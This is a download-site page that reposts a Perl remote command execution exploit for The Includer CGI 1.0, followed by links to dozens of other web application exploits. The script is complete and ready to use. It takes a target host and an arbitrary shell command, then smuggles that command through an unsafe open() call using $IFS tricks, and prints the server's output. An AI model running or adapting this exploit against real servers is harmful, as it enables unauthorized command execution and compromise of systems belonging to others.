FULL-TR.COM

Herþeyi FULL indir

• Anasayfa
• Program
• Grafik
• Oyun
• Müzik
• Video
• Adult
• Script
• Exploit
• PDA / Mobil
• E-Kitap
• Mizah

Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)

Eklenme Tarihi: 2008-10-20 23:00
#!/usr/bin/perl

############################################################
# Target - The Includer CGI <= 1.0 #
# #
# Based on - http://www.milw0rm.com/id.php?id=862 #
# #
# Info about bug - Stupid use "Open" function. #
# #
############################################################
# If you want know more visit our home page at nst.void.ru #
############################################################
use IO::Socket;


if (@ARGV < 3)
{
print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
print " Usage: <target> <dir> <cmd>\n\n";
print " <host> - Host name of taget.\n";
print " <dir> - If not in dir type / symbol.\n";
print " <cmd> - command for execution.\n\n";
print " Examples:\n\n";
print " incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
print " incl_10.pl 127.0.0.1 / \"uname -a\"\n";
print " incl_10.pl www.test.com / \"ps auxw\"\n";
exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];

print "\n ===[ Info for query ]========================\n";
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";

$cmde =~ s/ /"\$IFS"/ge;

$req = "GET http://$serv";
$req .= "$dir";
$req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";


$s = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$serv",
PeerPort=>80) or die " (-) - Can't connect to the server\n";

print $s $req;

$flag = 0;

while ($ans = <$s>)

{
if ($ans =~ /_T_/) { print " =========================================================\n"; exit() }
if ($flag == 1) { print " $ans"; }
if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }

}

Keywords:

Benzer Sayfalar (Similar Pages):

Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)

Bu Sayfalarda Ýlginizi Çekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit / Web Apps Exploit / UtilMind Mail List 1.7 - Users Can Execute Commands
Exploit / Web Apps Exploit / ListMail v112 - Command Execution
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
Exploit / Web Apps Exploit / PunBB version <= 1.2.2 Authentication Bypass Exploit
Exploit / Web Apps Exploit / ZPanel <= 2.5 Remote SQL Injection Exploit
Exploit / Web Apps Exploit / phpDEV5 Remote Default Insecure Users Vuln
Exploit / Web Apps Exploit / Download Center Lite (DCL) <= 1.5 Remote File Inclusion
Exploit / Web Apps Exploit / PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution
Exploit / Web Apps Exploit / vBulletin <= 3.0.4 "forumdisplay.php" Code Execution
Exploit / Web Apps Exploit / Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)
Exploit / Web Apps Exploit / Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
Exploit / Web Apps Exploit / Guppy <= 4.5.11 (Delete Databases) Remote Denial of Service Exploit

© 2008 Full-TR.com warez